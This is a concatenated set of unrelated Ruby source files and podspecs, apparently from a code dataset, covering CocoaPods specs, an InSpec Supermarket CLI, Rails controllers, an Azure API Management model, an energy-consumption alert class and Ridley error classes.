@type = type
@requests = requests
@call = call
@method = method
@metadata = metadata
end
##
# Return the name of the method being called, e.g. GetThing
#
# @return [String]
#
def method_name
@method.to_s.split('/').last
end
##
# Return the proper routing key for the request
#
# @return [String]
#
def route_key
@method[1..-1].underscore.tr('/', '.')
end
end
end
end
| 35.514286 | 120 | 0.669348 |
4a6a80864495b5b58f350d7ae8bb961e8f418832 | 1,532 | #
# Be sure to run `pod lib lint XHLRUView.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'XHLRUView'
s.version = '0.0.1'
s.summary = 'search history view'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = "a tool of search history view"
s.homepage = 'https://github.com/Lxh93/XHLRUView'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Lxh93' => '[email protected]' }
s.source = { :git => 'https://github.com/Lxh93/XHLRUView.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '9.0'
s.source_files = 'XHLRUView/Classes/**/*'
s.resource_bundles = {
'XHLRUView' => ['XHLRUView/Assets/*.png']
}
s.swift_version = '5.0'
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 36.47619 | 99 | 0.641645 |
e2b9bda130625e426d617e4a34b5c8765d06c145 | 2,273 | # encoding: utf-8
# author: Christoph Hartmann
# author: Dominik Richter
require 'inspec/base_cli'
module Supermarket
class SupermarketCLI < Inspec::BaseCLI
namespace 'supermarket'
# TODO: find another solution, once https://github.com/erikhuda/thor/issues/261 is fixed
def self.banner(command, _namespace = nil, _subcommand = false)
"#{basename} #{subcommand_prefix} #{command.usage}"
end
def self.subcommand_prefix
namespace
end
desc 'profiles', 'list all available profiles in Chef Supermarket'
def profiles
# display profiles in format user/profile
supermarket_profiles = Supermarket::API.profiles
headline('Available profiles:')
supermarket_profiles.each { |p|
li("#{p['tool_name']} #{mark_text(p['tool_owner'] + '/' + p['slug'])}")
}
end
desc 'exec PROFILE', 'execute a Supermarket profile'
exec_options
def exec(*tests)
o = config
diagnose(o)
configure_logger(o)
# iterate over tests and add compliance scheme
tests = tests.map { |t| 'supermarket://' + t }
runner = Inspec::Runner.new(o)
tests.each { |target| runner.add_target(target) }
exit runner.run
rescue ArgumentError, RuntimeError, Train::UserError => e
$stderr.puts e.message
exit 1
end
desc 'info PROFILE', 'display Supermarket profile details'
def info(profile)
# check that the profile is available
supermarket_profiles = Supermarket::API.profiles
found = supermarket_profiles.select { |p|
profile == "#{p['tool_owner']}/#{p['slug']}"
}
if found.empty?
puts "#{mark_text(profile)} is not available on Supermarket"
return
end
# load details for the specific profile
info = Supermarket::API.info(profile)
puts "#{mark_text('name: ')} #{info['slug']}"
puts "#{mark_text('owner:')} #{info['owner']}"
puts "#{mark_text('url: ')} #{info['source_url']}"
puts
puts "#{mark_text('description: ')} #{info['description']}"
end
end
# register the subcommand to InSpec CLI registry
Inspec::Plugins::CLI.add_subcommand(SupermarketCLI, 'supermarket', 'supermarket SUBCOMMAND ...', 'Supermarket commands', {})
end
| 30.306667 | 126 | 0.642763 |
1ca695ed47cd190153ddf6c4b0fb3e9b4d1d6895 | 2,630 | # frozen_string_literal: true
# Base class for implementing custom integration services.
class Integration::AbstractService < Integration::ServiceBase
class_attribute :adapter_class
attr_reader :integration, :adapter
def initialize(integration)
super
@adapter = adapter_class.new(integration.endpoint)
end
def call(entry)
case entry.record
when Proxy then handle_test
when Application then ClientFromApplication.call(entry)
when Client then handle_client(entry)
else handle_rest(entry)
end
end
def handle_client(entry)
client = build_client(entry)
if persist?(client)
persist(client)
else
remove(client)
end
end
# Convert Application to Client and trigger new update from the API.
# Creates new Client if needed and triggers UpdateJob for it.
class ClientFromApplication
def self.call(entry)
new(entry).call
end
attr_reader :tenant, :client_id, :scope
def initialize(entry)
@client_id = entry.last_known_data.dig('client_id')
@tenant = entry.tenant
@scope = Client.for_service(entry.record.service)
end
def call
return unless client_id
model = Model.create_record!(tenant) do
scope.find_or_create_by!(client_id: client_id)
end
UpdateJob.perform_later(model)
model
end
end
def handle_test
@adapter.test
end
def handle_rest(entry)
Rails.logger.debug { "[#{self.class.name}] skipping #{entry.to_gid} of record #{entry.record.to_gid}" }
end
EMPTY_DATA = {}.with_indifferent_access.freeze
private_constant :EMPTY_DATA
def client_id(entry)
case entry.model.weak_record
when Client
(entry.data || entry.previous_data).fetch('client_id') { return }
else
return
end
end
def persist?(_client)
raise NoMethodError, __method__
end
def build_client(entry)
data = entry.data
client = adapter_class.build_client(id: client_id(entry))
params = client_params(data || {})
client.assign_attributes(params)
client
end
OIDC_FLOWS = %i[
standard_flow_enabled implicit_flow_enabled service_accounts_enabled direct_access_grants_enabled
].freeze
private_constant :OIDC_FLOWS
def client_params(data)
params = ActionController::Parameters.new(data)
params.permit(:client_id, :client_secret, :redirect_url,
:state, :enabled, :name, :description,
oidc_configuration: OIDC_FLOWS)
end
def remove(_client)
raise NoMethodError, __method__
end
def persist(_client)
raise NoMethodError, __method__
end
end
| 22.672414 | 107 | 0.703802 |
e9a18e79415eee538a1ba60f1c222e7f6e1d3c42 | 1,198 | class UsersController < ApplicationController
before_action :authenticate_user!, only: [:secret]
# GET /accountsettings/profile
def info
@user = current_user
end
def credit_card
end
def secret
end
# PATCH /accountsettings/profile
def profile
puts "----------------------------------"
puts 'update'
@user = current_user
@user.first_name = user_params[:first_name]
@user.last_name = user_params[:last_name]
@user.phone = user_params[:phone]
@user.job = user_params[:job]
@user.company = user_params[:company]
@user.description = user_params[:description]
@user.website = user_params[:website]
@user.address = user_params[:address]
if @user.save
flash[:success] = "Update user profile succesfully!"
redirect_back(fallback_location: root_path)
else
@user.errors.full_messages.each do |message|
flash[:error] = message
end
render :contact_info
end
end
private
def user_params
params.require(:user).permit(
:first_name,
:last_name,
:description,
:phone,
:address,
:avatar,
:sex,
:job,
:company,
:website
)
end
end
| 19.966667 | 58 | 0.631886 |
1cb84bf1b2b638f9552c6dcde226c59c12bbce7d | 985 |
module EbayTrading # :nodoc:
module Types # :nodoc:
# == Attributes
# text_node :cancel_reason, 'CancelReason', :optional => true
# text_node :cancel_reason_details, 'CancelReasonDetails', :optional => true
# text_node :cancel_intiator, 'CancelIntiator', :optional => true
# datetime_node :cancel_intiation_date, 'CancelIntiationDate', :optional => true
# datetime_node :cancel_complete_date, 'CancelCompleteDate', :optional => true
class CancelDetail
include XML::Mapping
include Initializer
root_element_name 'CancelDetail'
text_node :cancel_reason, 'CancelReason', :optional => true
text_node :cancel_reason_details, 'CancelReasonDetails', :optional => true
text_node :cancel_intiator, 'CancelIntiator', :optional => true
datetime_node :cancel_intiation_date, 'CancelIntiationDate', :optional => true
datetime_node :cancel_complete_date, 'CancelCompleteDate', :optional => true
end
end
end
| 41.041667 | 85 | 0.718782 |
18128e8403b80ff0f2d2630f8a9406d87fa60bd6 | 4,287 | # Copyright © 2011 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class StudyTracker::SubServiceRequestsController < StudyTracker::BaseController
respond_to :js, :html
before_filter :check_work_fulfillment_status
def show
# TODO it might be nice to move these into a separate method so that
# other methods (notably, update) can load up the necesary instance
# methods without having to call #show, in case we add unintended
# side-effects to #show
session[:sub_service_request_id] = @sub_service_request.id
session[:service_request_id] = @sub_service_request.service_request_id
session[:service_calendar_pages] = params[:pages] if params[:pages]
@service_request = @sub_service_request.service_request
@protocol = Protocol.find(@service_request.protocol_id)
@candidate_per_patient_per_visit = @sub_service_request.candidate_services.reject {|x| x.is_one_time_fee?}
@candidate_one_time_fees = @sub_service_request.candidate_services.select {|x| x.is_one_time_fee?}
@line_items = LineItem.where(:sub_service_request_id => @sub_service_request.id)
@selected_arm = @service_request.arms.first
@study_tracker = true
# "Preload" the intial view of the payments and study level charges tabs with a blank form row
@sub_service_request.payments.build if @sub_service_request.payments.blank?
build_fulfillments
# get cwf organizations
@cwf_organizations = Organization.get_cwf_organizations
# min start date and max end date
cwf_audit = @sub_service_request.audits.where(:audited_changes => YAML.dump({"in_work_fulfillment" => [nil, true]})).first
@min_start_date = cwf_audit.nil? ? "N/A" : cwf_audit.created_at.utc
@max_end_date = Time.now.utc
end
def service_calendar
@service_request = @sub_service_request.service_request
end
def update
if @sub_service_request.update_attributes(params[:sub_service_request])
respond_to do |format|
format.js { render :js => "$('.routing_message').removeClass('uncheck').addClass('check')" }
format.html { redirect_to study_tracker_sub_service_request_path(@sub_service_request) }
end
else
respond_to do |format|
format.js { render :js => "$('.routing_message').removeClass('check').addClass('uncheck')" }
format.html do
# handle errors
show
render :show
end
end
end
end
private
def check_work_fulfillment_status
@sub_service_request ||= SubServiceRequest.find(params[:id])
unless @sub_service_request.in_work_fulfillment?
redirect_to root_path
end
end
def build_fulfillments
@sub_service_request.one_time_fee_line_items.each do |line_item|
line_item.fulfillments.build if line_item.fulfillments.blank?
end
end
end
| 45.126316 | 145 | 0.759272 |
3300139e4cc2833f7f149d09cb97150a894bcd46 | 12,138 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2016_10_10
module Models
#
# A single API Management service resource in List or Get response.
#
class ApiManagementServiceResource < Resource
include MsRestAzure
# @return [String] Publisher email.
attr_accessor :publisher_email
# @return [String] Publisher name.
attr_accessor :publisher_name
# @return [String] The current provisioning state of the API Management
# service which can be one of the following:
# Created/Activating/Succeeded/Updating/Failed/Stopped/Terminating/TerminationFailed/Deleted.
attr_accessor :provisioning_state
# @return [String] The provisioning state of the API Management service,
# which is targeted by the long running operation started on the service.
attr_accessor :target_provisioning_state
# @return [DateTime] Creation UTC date of the API Management service.The
# date conforms to the following format: `yyyy-MM-ddTHH:mm:ssZ` as
# specified by the ISO 8601 standard.
attr_accessor :created_at_utc
# @return [String] Proxy endpoint URL of the API Management service.
attr_accessor :runtime_url
# @return [String] Publisher portal endpoint Url of the API Management
# service.
attr_accessor :portal_url
# @return [String] Management API endpoint URL of the API Management
# service.
attr_accessor :management_api_url
# @return [String] SCM endpoint URL of the API Management service.
attr_accessor :scm_url
# @return [String] Addresser email.
attr_accessor :addresser_email
# @return [Array<HostnameConfiguration>] Custom hostname configuration of
# the API Management service.
attr_accessor :hostname_configurations
# @return [Array<String>] Static IP addresses of the API Management
# service virtual machines. Available only for Standard and Premium SKU.
attr_accessor :static_ips
# @return [VirtualNetworkConfiguration] Virtual network configuration of
# the API Management service.
attr_accessor :vpnconfiguration
# @return [Array<AdditionalRegion>] Additional datacenter locations of
# the API Management service.
attr_accessor :additional_locations
# @return [Hash{String => String}] Custom properties of the API
# Management service, like disabling TLS 1.0.
attr_accessor :custom_properties
# @return [VirtualNetworkType] The type of VPN in which API Managemet
# service needs to be configured in. None (Default Value) means the API
# Management service is not part of any Virtual Network, External means
# the API Management deployment is set up inside a Virtual Network having
# an Internet Facing Endpoint, and Internal means that API Management
# deployment is setup inside a Virtual Network having an Intranet Facing
# Endpoint only. Possible values include: 'None', 'External', 'Internal'.
# Default value: 'None' .
attr_accessor :vpn_type
# @return [ApiManagementServiceSkuProperties] SKU properties of the API
# Management service.
attr_accessor :sku
# @return [String] ETag of the resource.
attr_accessor :etag
#
# Mapper for ApiManagementServiceResource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ApiManagementServiceResource',
type: {
name: 'Composite',
class_name: 'ApiManagementServiceResource',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: true,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
publisher_email: {
client_side_validation: true,
required: true,
serialized_name: 'properties.publisherEmail',
constraints: {
MaxLength: 100
},
type: {
name: 'String'
}
},
publisher_name: {
client_side_validation: true,
required: true,
serialized_name: 'properties.publisherName',
type: {
name: 'String'
}
},
provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
target_provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.targetProvisioningState',
type: {
name: 'String'
}
},
created_at_utc: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.createdAtUtc',
type: {
name: 'DateTime'
}
},
runtime_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.runtimeUrl',
type: {
name: 'String'
}
},
portal_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.portalUrl',
type: {
name: 'String'
}
},
management_api_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.managementApiUrl',
type: {
name: 'String'
}
},
scm_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.scmUrl',
type: {
name: 'String'
}
},
addresser_email: {
client_side_validation: true,
required: false,
serialized_name: 'properties.addresserEmail',
type: {
name: 'String'
}
},
hostname_configurations: {
client_side_validation: true,
required: false,
serialized_name: 'properties.hostnameConfigurations',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'HostnameConfigurationElementType',
type: {
name: 'Composite',
class_name: 'HostnameConfiguration'
}
}
}
},
static_ips: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.staticIPs',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
vpnconfiguration: {
client_side_validation: true,
required: false,
serialized_name: 'properties.vpnconfiguration',
type: {
name: 'Composite',
class_name: 'VirtualNetworkConfiguration'
}
},
additional_locations: {
client_side_validation: true,
required: false,
serialized_name: 'properties.additionalLocations',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'AdditionalRegionElementType',
type: {
name: 'Composite',
class_name: 'AdditionalRegion'
}
}
}
},
custom_properties: {
client_side_validation: true,
required: false,
serialized_name: 'properties.customProperties',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
vpn_type: {
client_side_validation: true,
required: false,
serialized_name: 'properties.vpnType',
default_value: 'None',
type: {
name: 'Enum',
module: 'VirtualNetworkType'
}
},
sku: {
client_side_validation: true,
required: true,
serialized_name: 'sku',
type: {
name: 'Composite',
class_name: 'ApiManagementServiceSkuProperties'
}
},
etag: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'etag',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 34.288136 | 99 | 0.480392 |
08f81c700718f66c29b512cf9228e611ad400920 | 1,713 | class ToolController < ApplicationController
# def actuator
# @files = get_displays()
# @ports = get_ports()
# # render :json => @ports
# render :layout => "full_screen"
# end
def midi
render :layout => "full_screen"
end
def annotator
render :layout => "full_screen"
end
def statemachine
@files = get_displays()
@ports = get_ports()
# render :json => @ports
render :layout => "full_screen"
end
def cwa
@files = get_displays()
@ports = get_ports()
@metadata = Device.data()
# render :json => @metadata.actuators
# render :json => get_displays()
render :layout => "full_screen"
end
def aesthetic_actuation
@files = get_displays()
@ports = get_ports()
@metadata = Device.data()
# render :json => @metadata.actuators
render :layout => "full_screen"
end
def system_control
@files = get_displays()
@ports = get_ports()
# render :json => @ports
render :layout => "full_screen"
end
def designer
@files = get_displays()
# render :json => @files
render :layout => "full_screen"
end
def index
@files = get_displays()
render :layout => "full_screen"
end
def displays
@files = get_displays()
render :json => @files
end
def start_server
# NOTE: currently doesn't work :(
# dir = system('ruby ./ruby_scripts/ArduinoServer.rb &')
dir = system("sh start_server.sh")
render :json => {msg: "I started server", debug: dir}
end
# HELPER METHODS
def get_ports
ports = ["/dev/tty.usb*", "/dev/tty.AestheticAquarium-DevB", "/dev/tty.wc*", "/dev/cu.HC-06-DevB"] #"/dev/tty.HC*",
ports.map!{|p| Dir[p]}
ports.flatten!
end
end
| 22.246753 | 120 | 0.617046 |
08c8cbed7479e2d2c6f6abe1300bda5e15f571e1 | 8,024 | #======================== Change in Daily Electricity Consumption =============
require_relative 'alert_electricity_only_base.rb'
class AlertChangeInDailyElectricityShortTerm < AlertElectricityOnlyBase
MAXDAILYCHANGE = 1.05
attr_reader :last_weeks_consumption_kwh, :week_befores_consumption_kwh
attr_reader :last_weeks_consumption_£, :week_befores_consumption_£
attr_reader :signifcant_increase_in_electricity_consumption
attr_reader :beginning_of_week, :beginning_of_last_week
attr_reader :one_year_saving_£, :percent_change_in_consumption
def initialize(school)
super(school, :changeinelectricityconsumption)
end
def self.template_variables
specific = {'Change in electricity short term' => TEMPLATE_VARIABLES}
specific.merge(self.superclass.template_variables)
end
TEMPLATE_VARIABLES = {
last_weeks_consumption_kwh: {
description: 'Last weeks electricity consumption on school days - kwh',
units: {kwh: :electricity}
},
week_befores_consumption_kwh: {
description: 'The week befores electricity consumption on school days - kwh',
units: {kwh: :electricity}
},
last_weeks_consumption_£: {
description: 'Last weeks electricity consumption on school days - £',
units: :£
},
week_befores_consumption_£: {
description: 'The week befores electricity consumption on school days - £',
units: :£,
},
signifcant_increase_in_electricity_consumption: {
description: 'More than 5% increase in weekly electricity consumption in last 2 weeks',
units: TrueClass
},
percent_change_in_consumption: {
description: 'Percent change in electricity consumption between last 2 weeks',
units: :percent
},
beginning_of_week: {
description: 'Date of beginning of most recent assessment week',
units: :date
},
beginning_of_last_week: {
description: 'Date of beginning of previous assessment week',
units: :date
},
week_on_week_electricity_daily_electricity_comparison_chart: {
description: 'Week on week daily electricity comparison chart column chart',
units: :chart
},
last_5_weeks_intraday_school_day_chart: {
description: 'Average kW intraday for last 5 weeks line chart',
units: :chart
},
last_7_days_intraday_chart: {
description: 'Last 7 days intraday chart line chart',
units: :chart
},
}.freeze
def week_on_week_electricity_daily_electricity_comparison_chart
:alert_week_on_week_electricity_daily_electricity_comparison_chart
end
def last_5_weeks_intraday_school_day_chart
:alert_intraday_line_school_days_last5weeks
end
def last_7_days_intraday_chart
:alert_intraday_line_school_last7days
end
def timescale
'week (school days only)'
end
private def calculate(asof_date)
# super(asof_date)
days_in_week = 5
@beginning_of_week, @last_weeks_consumption_kwh = schoolday_energy_usage_over_period(asof_date, days_in_week)
@beginning_of_last_week, @week_befores_consumption_kwh = schoolday_energy_usage_over_period(@beginning_of_week - 1, days_in_week)
@last_weeks_consumption_£ = @last_weeks_consumption_kwh * BenchmarkMetrics::ELECTRICITY_PRICE
@week_befores_consumption_£ = @week_befores_consumption_kwh * BenchmarkMetrics::ELECTRICITY_PRICE
@signifcant_increase_in_electricity_consumption = @last_weeks_consumption_kwh > @week_befores_consumption_kwh * MAXDAILYCHANGE
@percent_change_in_consumption = ((@last_weeks_consumption_kwh - @week_befores_consumption_kwh) / @week_befores_consumption_kwh)
saving_£ = 195.0 * (@last_weeks_consumption_£ - @week_befores_consumption_£) / days_in_week
@one_year_saving_£ = Range.new(saving_£, saving_£)
@rating = [10.0 - 10.0 * [@percent_change_in_consumption / 0.3, 0.0].max, 10.0].min.round(1)
@status = @signifcant_increase_in_electricity_consumption ? :bad : :good
@term = :shortterm
@bookmark_url = add_book_mark_to_base_url('ElectricityChange')
end
def default_content
%{
<% if signifcant_increase_in_electricity_consumption %>
<p>
Your electricity consumption on school days has increased from
<%= week_befores_consumption_£ %> (<%= week_befores_consumption_kwh %>) last week (week starting <%= beginning_of_last_week %>) to
<%= last_weeks_consumption_£ %> (<%= last_weeks_consumption_kwh %>) this week (week starting <%= beginning_of_week %>).
If this continues it will cost you an additional <%= one_year_saving_£ %> over the next year.
</p>
<% else %>
<p>
Your electricity consumption on school days last week was
<%= week_befores_consumption_£ %> (<%= week_befores_consumption_kwh %>) - (week starting <%= beginning_of_last_week %>).
Your electricity consumption on school days this week is
<%= last_weeks_consumption_£ %> (<%= last_weeks_consumption_kwh %>) - (week starting <%= beginning_of_week %>).
</p>
<% end %>
}.gsub(/^ /, '')
end
def default_summary
%{
<% if signifcant_increase_in_electricity_consumption %>
Your daily electricity consumption has increased.
<% else %>
Your daily electricity consumption is good
<% end %>
}.gsub(/^ /, '')
end
def analyse_private(asof_date)
calculate(asof_date)
days_in_week = 5
beginning_of_week, last_weeks_consumption = schoolday_energy_usage_over_period(asof_date, days_in_week)
beginning_of_last_week, week_befores_consumption = schoolday_energy_usage_over_period(beginning_of_week - 1, days_in_week)
@analysis_report.term = :shortterm
@analysis_report.add_book_mark_to_base_url('ElectricityChange')
if last_weeks_consumption > week_befores_consumption * MAXDAILYCHANGE
last_weeks_baseload = average_baseload_kw(asof_date - 7, asof_date)
@analysis_report.summary = 'Your daily electricity consumption has increased'
text = sprintf('Your electricity consumption has increased from %.0f kWh ', week_befores_consumption)
text += sprintf('last week (5 school days following %s) ', beginning_of_last_week.to_formatted_s(:long_ordinal))
text += sprintf('to %.0f kWh ', last_weeks_consumption)
text += sprintf('this week (5 school days following %s) ', beginning_of_week.to_formatted_s(:long_ordinal))
text += sprintf('over the last year to %.1f last week. ', last_weeks_baseload)
cost = BenchmarkMetrics::ELECTRICITY_PRICE * 195.0 * (last_weeks_consumption - week_befores_consumption) / days_in_week
text += sprintf('If this continues it will costs you an additional £%.0f over the next year.', cost)
description1 = AlertDescriptionDetail.new(:text, text)
@analysis_report.rating = 2.0
@analysis_report.status = :poor
else
@analysis_report.summary = 'Your daily electricity consumption is good'
text = sprintf('Your weekly school day electricity consumption was %.0f kWh (£%.0f) this week ',
last_weeks_consumption,
last_weeks_consumption * BenchmarkMetrics::ELECTRICITY_PRICE)
text += sprintf('compared with %.0f kWh (£%.0f) last week.',
week_befores_consumption,
week_befores_consumption * BenchmarkMetrics::ELECTRICITY_PRICE)
description1 = AlertDescriptionDetail.new(:text, text)
@analysis_report.rating = 10.0
@analysis_report.status = :good
end
@analysis_report.add_detail(description1)
end
private def schoolday_energy_usage_over_period(asof_date, school_days)
list_of_school_days = last_n_school_days(asof_date, school_days)
total_kwh = 0.0
list_of_school_days.each do |date|
total_kwh += days_energy_consumption(date)
end
[list_of_school_days[0], total_kwh]
end
private def days_energy_consumption(date)
amr_data = @school.aggregated_electricity_meters.amr_data
amr_data.one_day_kwh(date)
end
end | 42.680851 | 140 | 0.722832 |
e93d0aa3acec739f74a8c3fb06157b515f76ff62 | 5,992 | module Ridley
module Errors
class RidleyError < StandardError; end
class InternalError < RidleyError; end
class ArgumentError < InternalError; end
class ClientError < RidleyError; end
class ConnectionFailed < ClientError; end
class TimeoutError < ClientError; end
class ResourceNotFound < RidleyError; end
class ValidatorNotFound < RidleyError; end
class InvalidResource < RidleyError
attr_reader :errors
def initialize(errors)
@errors = errors
end
def message
errors.values
end
alias_method :to_s, :message
end
class UnknownCookbookFileType < RidleyError
attr_reader :type
def initialize(type)
@type = type
end
def to_s
"filetype: '#{type}'"
end
end
class CookbookSyntaxError < RidleyError; end
class EncryptedDataBagSecretNotSet < RidleyError
def message
"no encrypted data bag secret was set for this Ridley connection"
end
end
class FromFileParserError < RidleyError
def initialize(filename, error)
super "Could not parse `#{filename}': #{error.message}"
# Populate the backtrace with the actual error though
set_backtrace(error.backtrace)
end
end
class BootstrapError < RidleyError; end
class ClientKeyFileNotFoundOrInvalid < BootstrapError; end
class EncryptedDataBagSecretNotFound < BootstrapError; end
class HostConnectionError < RidleyError; end
class DNSResolvError < HostConnectionError; end
class RemoteCommandError < RidleyError; end
class RemoteScriptError < RemoteCommandError; end
class CommandNotProvided < RemoteCommandError
attr_reader :connector_type
# @params [Symbol] connector_type
def initialize(connector_type)
@connector_type = connector_type
end
def to_s
"No command provided in #{connector_type.inspect}, however the #{connector_type.inspect} connector was selected."
end
end
# Exception thrown when the maximum amount of requests is exceeded.
class RedirectLimitReached < RidleyError
attr_reader :response
def initialize(response)
super "too many redirects; last one to: #{response['location']}"
@response = response
end
end
class FrozenCookbook < RidleyError; end
class SandboxCommitError < RidleyError; end
class PermissionDenied < RidleyError; end
class SandboxUploadError < RidleyError; end
class ChecksumMismatch < RidleyError; end
class HTTPError < RidleyError
class << self
def fabricate(env)
klass = lookup_error(env[:status].to_i)
klass.new(env)
end
def register_error(status)
error_map[status.to_i] = self
end
def lookup_error(status)
error_map.fetch(status.to_i)
rescue KeyError
HTTPUnknownStatus
end
def error_map
@@error_map ||= Hash.new
end
end
attr_reader :env
attr_reader :errors
attr_reader :message
alias_method :to_s, :message
def initialize(env)
@env = env
@errors = env[:body].is_a?(Hash) ? Array(env[:body][:error]) : []
if errors.empty?
@message = env[:body] || "no content body"
else
@message = "errors: "
@message << errors.collect { |e| "'#{e}'" }.join(', ')
end
end
end
class HTTPUnknownStatus < HTTPError
def initialize(env)
super(env)
@message = "status: #{env[:status]} is an unknown HTTP status code or not an error."
end
end
class HTTPUnknownMethod < HTTPError
attr_reader :method
def initialize(method)
@method = method
@message = "unknown http method: #{method}"
end
end
class HTTP3XXError < HTTPError; end
class HTTP4XXError < HTTPError; end
class HTTP5XXError < HTTPError; end
# 3XX
class HTTPMultipleChoices < HTTP3XXError; register_error(300); end
class HTTPMovedPermanently < HTTP3XXError; register_error(301); end
class HTTPFound < HTTP3XXError; register_error(302); end
class HTTPSeeOther < HTTP3XXError; register_error(303); end
class HTTPNotModified < HTTP3XXError; register_error(304); end
class HTTPUseProxy < HTTP3XXError; register_error(305); end
class HTTPTemporaryRedirect < HTTP3XXError; register_error(307); end
# 4XX
class HTTPBadRequest < HTTP4XXError; register_error(400); end
class HTTPUnauthorized < HTTP4XXError; register_error(401); end
class HTTPPaymentRequired < HTTP4XXError; register_error(402); end
class HTTPForbidden < HTTP4XXError; register_error(403); end
class HTTPNotFound < HTTP4XXError; register_error(404); end
class HTTPMethodNotAllowed < HTTP4XXError; register_error(405); end
class HTTPNotAcceptable < HTTP4XXError; register_error(406); end
class HTTPProxyAuthenticationRequired < HTTP4XXError; register_error(407); end
class HTTPRequestTimeout < HTTP4XXError; register_error(408); end
class HTTPConflict < HTTP4XXError; register_error(409); end
class HTTPGone < HTTP4XXError; register_error(410); end
class HTTPLengthRequired < HTTP4XXError; register_error(411); end
class HTTPPreconditionFailed < HTTP4XXError; register_error(412); end
class HTTPRequestEntityTooLarge < HTTP4XXError; register_error(413); end
class HTTPRequestURITooLong < HTTP4XXError; register_error(414); end
class HTTPUnsupportedMediaType < HTTP4XXError; register_error(415); end
# 5XX
class HTTPInternalServerError < HTTP5XXError; register_error(500); end
class HTTPNotImplemented < HTTP5XXError; register_error(501); end
class HTTPBadGateway < HTTP5XXError; register_error(502); end
class HTTPServiceUnavailable < HTTP5XXError; register_error(503); end
class HTTPGatewayTimeout < HTTP5XXError; register_error(504); end
end
end
| 31.703704 | 121 | 0.688752 |
bb68ecdbf6e79d7267572a721b7b1d096f1c6d7e | 972 | Pod::Spec.new do |s|
s.name = "PickImageAlert"
s.version = "1.0.6"
s.summary = "Photos or camera access using the system alert controller"
s.description = "PickImageAlert provides a list of your photos in your alert controller with three alert actions"
s.requires_arc = true
s.homepage = "https://github.com/thejohnlima/PickImageAlert"
s.license = "MIT"
s.author = { "John Lima" => "[email protected]" }
s.social_media_url = "https://twitter.com/thejohnlima"
s.platform = :ios, "11.0"
s.source = { :git => "https://github.com/thejohnlima/PickImageAlert.git", :tag => "#{s.version}" }
s.framework = "UIKit"
s.source_files = "Framework/PickImageAlert/**/*.{swift}"
s.resources = "Framework/PickImageAlert/**/*.{png,jpeg,jpg,storyboard,xib,xcassets}"
s.swift_version = "5.0"
s.dependency 'SwiftLint'
